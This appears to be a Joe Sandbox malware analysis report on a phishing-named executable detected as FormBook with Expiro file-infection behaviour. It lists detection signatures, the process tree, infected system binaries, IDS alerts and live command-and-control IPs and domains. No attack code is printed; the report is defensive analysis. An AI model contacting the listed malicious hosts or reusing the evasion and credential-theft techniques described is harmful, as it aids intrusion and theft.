Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
RFQ _ Virtue 054451000085.exe

Overview

General Information

Sample name:RFQ _ Virtue 054451000085.exe
Analysis ID:1571270
MD5:dd6599c8b0d09a38d88ef2c1e1720a6c
SHA1:d538a849b763558e1577817593d00691e382b81a
SHA256:ed0b66043d5223c79f2206468bd12d369d933e0db2234508702ce7402579835f
Tags:exeWormm0yvuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Contains functionality to behave differently if execute on a Russian/Kazak computer
Creates files in the system32 config directory
Drops executable to a common third party application directory
Found direct / indirect Syscall (likely to bypass EDR)
Infects executable files (exe, dll, sys, html)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Enables driver privileges
Enables security privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains more sections than normal
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Uncommon Svchost Parent Process
Spawns drivers
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • RFQ _ Virtue 054451000085.exe (PID: 5784 cmdline: "C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe" MD5: DD6599C8B0D09A38D88EF2C1E1720A6C)
    • svchost.exe (PID: 2268 cmdline: "C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • iavbXasnTxCeiF.exe (PID: 5396 cmdline: "C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • choice.exe (PID: 3576 cmdline: "C:\Windows\SysWOW64\choice.exe" MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
          • iavbXasnTxCeiF.exe (PID: 5576 cmdline: "C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 1196 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: 30AE870CC81481FC14F2B11D911AB42F)
  • armsvc.exe (PID: 1588 cmdline: "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe" MD5: 785A052E614E12F8A62CD368B4273290)
  • alg.exe (PID: 2168 cmdline: C:\Windows\System32\alg.exe MD5: 5DBFDD947810E81DAFCE72FA7C481167)
  • AppVStrm.sys (PID: 4 cmdline: MD5: BDA55F89B69757320BC125FF1CB53B26)
  • AppvVemgr.sys (PID: 4 cmdline: MD5: E70EE9B57F8D771E2F4D6E6B535F6757)
  • AppvVfs.sys (PID: 4 cmdline: MD5: 2CBABD729D5E746B6BD8DC1B4B4DB1E1)
  • AppVClient.exe (PID: 736 cmdline: C:\Windows\system32\AppVClient.exe MD5: 1D7D22CFCA51F1A73A539A64CC53B616)
  • FXSSVC.exe (PID: 6424 cmdline: C:\Windows\system32\fxssvc.exe MD5: 2F8DCF43C75A2511D20EB9E59E43AB07)
  • maintenanceservice.exe (PID: 1196 cmdline: "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe" MD5: A46C8436F8D489B69D8BDDEB6C9361EB)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000010.00000002.2750875662.00000000041A0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000010.00000002.2742686769.0000000002310000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000000A.00000002.1948226001.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        0000000A.00000002.1950189449.00000000038D0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000010.00000002.2751208214.00000000041F0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries
            SourceRuleDescriptionAuthorStrings
            10.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              10.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                System Summary

                barindex
                Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: , CommandLine: , CommandLine|base64offset|contains: , Image: C:\Windows\System32\drivers\AppVStrm.sys, NewProcessName: C:\Windows\System32\drivers\AppVStrm.sys, OriginalFileName: C:\Windows\System32\drivers\AppVStrm.sys, ParentCommandLine: , ParentImage: , ParentProcessId: -1, ProcessCommandLine: , ProcessId: 4, ProcessName: AppVStrm.sys
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe", CommandLine: "C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe", ParentImage: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe, ParentProcessId: 5784, ParentProcessName: RFQ _ Virtue 054451000085.exe, ProcessCommandLine: "C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe", ProcessId: 2268, ProcessName: svchost.exe
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe", CommandLine: "C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe", ParentImage: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe, ParentProcessId: 5784, ParentProcessName: RFQ _ Virtue 054451000085.exe, ProcessCommandLine: "C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe", ProcessId: 2268, ProcessName: svchost.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-09T08:32:00.400791+010020516491A Network Trojan was detected192.168.2.7550111.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-09T08:31:51.722646+010020516481A Network Trojan was detected192.168.2.7559261.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-09T08:31:43.820628+010020181411A Network Trojan was detected54.244.188.17780192.168.2.749706TCP
                2024-12-09T08:31:47.049148+010020181411A Network Trojan was detected18.141.10.10780192.168.2.749707TCP
                2024-12-09T08:31:51.782086+010020181411A Network Trojan was detected44.221.84.10580192.168.2.749709TCP
                2024-12-09T08:33:37.375955+010020181411A Network Trojan was detected47.129.31.21280192.168.2.749837TCP
                2024-12-09T08:33:40.161940+010020181411A Network Trojan was detected13.251.16.15080192.168.2.749844TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-09T08:31:43.820628+010020377711A Network Trojan was detected54.244.188.17780192.168.2.749706TCP
                2024-12-09T08:31:47.049148+010020377711A Network Trojan was detected18.141.10.10780192.168.2.749707TCP
                2024-12-09T08:31:51.782086+010020377711A Network Trojan was detected44.221.84.10580192.168.2.749709TCP
                2024-12-09T08:33:37.375955+010020377711A Network Trojan was detected47.129.31.21280192.168.2.749837TCP
                2024-12-09T08:33:40.161940+010020377711A Network Trojan was detected13.251.16.15080192.168.2.749844TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-09T08:32:39.722151+010028554651A Network Trojan was detected192.168.2.749722217.70.184.5080TCP
                2024-12-09T08:33:04.952823+010028554651A Network Trojan was detected192.168.2.749753154.23.184.20780TCP
                2024-12-09T08:33:21.001094+010028554651A Network Trojan was detected192.168.2.74979338.165.29.23480TCP
                2024-12-09T08:33:36.031248+010028554651A Network Trojan was detected192.168.2.74983313.248.169.4880TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-09T08:32:56.947433+010028554641A Network Trojan was detected192.168.2.749735154.23.184.20780TCP
                2024-12-09T08:32:59.612568+010028554641A Network Trojan was detected192.168.2.749741154.23.184.20780TCP
                2024-12-09T08:33:02.268891+010028554641A Network Trojan was detected192.168.2.749747154.23.184.20780TCP
                2024-12-09T08:33:12.398406+010028554641A Network Trojan was detected192.168.2.74977438.165.29.23480TCP
                2024-12-09T08:33:15.082147+010028554641A Network Trojan was detected192.168.2.74978138.165.29.23480TCP
                2024-12-09T08:33:17.769352+010028554641A Network Trojan was detected192.168.2.74978738.165.29.23480TCP
                2024-12-09T08:33:27.762203+010028554641A Network Trojan was detected192.168.2.74981313.248.169.4880TCP
                2024-12-09T08:33:30.438993+010028554641A Network Trojan was detected192.168.2.74982013.248.169.4880TCP
                2024-12-09T08:33:33.198157+010028554641A Network Trojan was detected192.168.2.74982613.248.169.4880TCP
                2024-12-09T08:33:43.193931+010028554641A Network Trojan was detected192.168.2.749852156.251.17.22480TCP
                2024-12-09T08:33:47.285549+010028554641A Network Trojan was detected192.168.2.749865156.251.17.22480TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-09T08:31:42.841913+010028508511Malware Command and Control Activity Detected192.168.2.74970518.141.10.10780TCP
                2024-12-09T08:32:48.923482+010028508511Malware Command and Control Activity Detected192.168.2.74972082.112.184.19780TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: RFQ _ Virtue 054451000085.exeAvira: detected
                Source: http://54.244.188.177/hAvira URL Cloud: Label: phishing
                Source: http://www.duwixushx.xyz/u11p/Avira URL Cloud: Label: malware
                Source: http://www.duwixushx.xyzAvira URL Cloud: Label: malware
                Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeAvira: detection malicious, Label: W32/Infector.Gen
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeAvira: detection malicious, Label: W32/Infector.Gen
                Source: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeAvira: detection malicious, Label: W32/Infector.Gen
                Source: C:\Windows\System32\AppVClient.exeAvira: detection malicious, Label: W32/Infector.Gen
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeAvira: detection malicious, Label: W32/Infector.Gen
                Source: C:\Windows\System32\FXSSVC.exeAvira: detection malicious, Label: W32/Infector.Gen
                Source: C:\Windows\System32\alg.exeAvira: detection malicious, Label: W32/Infector.Gen
                Source: RFQ _ Virtue 054451000085.exeReversingLabs: Detection: 81%
                Source: RFQ _ Virtue 054451000085.exeVirustotal: Detection: 75%Perma Link
                Source: Yara matchFile source: 10.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000010.00000002.2750875662.00000000041A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.2742686769.0000000002310000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.1948226001.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.1950189449.00000000038D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.2751208214.00000000041F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.1952345279.0000000004A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.2753929696.00000000051A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.2750881056.0000000003910000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJoe Sandbox ML: detected
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJoe Sandbox ML: detected
                Source: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJoe Sandbox ML: detected
                Source: C:\Windows\System32\AppVClient.exeJoe Sandbox ML: detected
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJoe Sandbox ML: detected
                Source: C:\Windows\System32\FXSSVC.exeJoe Sandbox ML: detected
                Source: C:\Windows\System32\alg.exeJoe Sandbox ML: detected
                Source: RFQ _ Virtue 054451000085.exeJoe Sandbox ML: detected
                Source: RFQ _ Virtue 054451000085.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: choice.pdbGCTL source: svchost.exe, 0000000A.00000003.1915858203.000000000342B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1914993695.000000000341A000.00000004.00000020.00020000.00000000.sdmp, iavbXasnTxCeiF.exe, 0000000D.00000003.1891549691.00000000014A5000.00000004.00000001.00020000.00000000.sdmp, iavbXasnTxCeiF.exe, 0000000D.00000002.2748610451.000000000148E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: RFQ _ Virtue 054451000085.exe, 00000000.00000003.1491077999.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe.0.dr
                Source: Binary string: D:\a\_work\e\src\out\Release_x64\elevation_service.exe.pdb source: elevation_service.exe.0.dr
                Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: RFQ _ Virtue 054451000085.exe, 00000000.00000003.1518745124.0000000004190000.00000004.00001000.00020000.00000000.sdmp, DiagnosticsHub.StandardCollector.Service.exe.0.dr
                Source: Binary string: AppVClient.pdbGCTL source: AppVClient.exe.0.dr
                Source: Binary string: ALG.pdbGCTL source: RFQ _ Virtue 054451000085.exe, 00000000.00000003.1495810480.0000000003F20000.00000004.00001000.00020000.00000000.sdmp, alg.exe.0.dr
                Source: Binary string: AppVClient.pdb source: AppVClient.exe.0.dr
                Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: RFQ _ Virtue 054451000085.exe, 00000000.00000003.1518745124.0000000004190000.00000004.00001000.00020000.00000000.sdmp, DiagnosticsHub.StandardCollector.Service.exe.0.dr
                Source: Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: RFQ _ Virtue 054451000085.exe, 00000000.00000003.1530790654.0000000004180000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: PresentationFontCache.pdb source: RFQ _ Virtue 054451000085.exe, 00000000.00000003.1530790654.0000000004180000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: iavbXasnTxCeiF.exe, 0000000D.00000002.2742686051.000000000021E000.00000002.00000001.01000000.00000005.sdmp, iavbXasnTxCeiF.exe, 00000011.00000000.2031373413.000000000021E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: FXSSVC.pdbGCTL source: FXSSVC.exe.0.dr
                Source: Binary string: wntdll.pdbUGP source: RFQ _ Virtue 054451000085.exe, 00000000.00000003.1534604945.0000000005060000.00000004.00001000.00020000.00000000.sdmp, RFQ _ Virtue 054451000085.exe, 00000000.00000003.1532831867.0000000004EC0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1839279919.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.1950383835.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1841739814.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.1950383835.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, choice.exe, 00000010.00000003.1953424906.0000000004257000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000010.00000003.1948543283.00000000040A4000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000010.00000002.2751812627.000000000459E000.00000040.00001000.00020000.00000000.sdmp, choice.exe, 00000010.00000002.2751812627.0000000004400000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: RFQ _ Virtue 054451000085.exe, 00000000.00000003.1534604945.0000000005060000.00000004.00001000.00020000.00000000.sdmp, RFQ _ Virtue 054451000085.exe, 00000000.00000003.1532831867.0000000004EC0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 0000000A.00000003.1839279919.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.1950383835.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1841739814.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.1950383835.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, choice.exe, 00000010.00000003.1953424906.0000000004257000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000010.00000003.1948543283.00000000040A4000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000010.00000002.2751812627.000000000459E000.00000040.00001000.00020000.00000000.sdmp, choice.exe, 00000010.00000002.2751812627.0000000004400000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\a\_work\e\src\out\Release_x64\elevation_service.exe.pdbOGP source: elevation_service.exe.0.dr
                Source: Binary string: C:\b\s\w\ir\cache\builder\src\out\Release_x64\elevation_service.exe.pdb source: elevation_service.exe0.0.dr
                Source: Binary string: FXSSVC.pdb source: FXSSVC.exe.0.dr
                Source: Binary string: ALG.pdb source: RFQ _ Virtue 054451000085.exe, 00000000.00000003.1495810480.0000000003F20000.00000004.00001000.00020000.00000000.sdmp, alg.exe.0.dr
                Source: Binary string: choice.pdb source: svchost.exe, 0000000A.00000003.1915858203.000000000342B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1914993695.000000000341A000.00000004.00000020.00020000.00000000.sdmp, iavbXasnTxCeiF.exe, 0000000D.00000003.1891549691.00000000014A5000.00000004.00000001.00020000.00000000.sdmp, iavbXasnTxCeiF.exe, 0000000D.00000002.2748610451.000000000148E000.00000004.00000020.00020000.00000000.sdmp

                Spreading

                barindex
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeSystem file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to behavior
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeSystem file written: C:\Windows\System32\AppVClient.exeJump to behavior
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeSystem file written: C:\Windows\System32\FXSSVC.exeJump to behavior
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to behavior
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeSystem file written: C:\Windows\System32\alg.exeJump to behavior
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\elevation_service.exeJump to behavior
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_0046445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0046445A
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_0046C6D1 FindFirstFileW,FindClose,0_2_0046C6D1
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_0046C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0046C75C
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_0046EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0046EF95
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_0046F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0046F0F2
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_0046F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0046F3F3
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_004637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_004637EF
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_00463B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00463B12
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_0046BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0046BCBC

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.7:55926 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.7:55011 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.7:49705 -> 18.141.10.107:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49722 -> 217.70.184.50:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49735 -> 154.23.184.207:80
                Source: Network trafficSuricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.7:49720 -> 82.112.184.197:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49741 -> 154.23.184.207:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49747 -> 154.23.184.207:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49753 -> 154.23.184.207:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49774 -> 38.165.29.234:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49781 -> 38.165.29.234:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49787 -> 38.165.29.234:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49793 -> 38.165.29.234:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49813 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49820 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49826 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49833 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49865 -> 156.251.17.224:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49852 -> 156.251.17.224:80
                Source: DNS query: www.duwixushx.xyz
                Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                Source: Joe Sandbox ViewIP Address: 54.244.188.177 54.244.188.177
                Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
                Source: Joe Sandbox ViewASN Name: COGENT-174US COGENT-174US
                Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.141.10.107:80 -> 192.168.2.7:49707
                Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 54.244.188.177:80 -> 192.168.2.7:49706
                Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 54.244.188.177:80 -> 192.168.2.7:49706
                Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 44.221.84.105:80 -> 192.168.2.7:49709
                Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 44.221.84.105:80 -> 192.168.2.7:49709
                Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.141.10.107:80 -> 192.168.2.7:49707
                Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 47.129.31.212:80 -> 192.168.2.7:49837
                Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 13.251.16.150:80 -> 192.168.2.7:49844
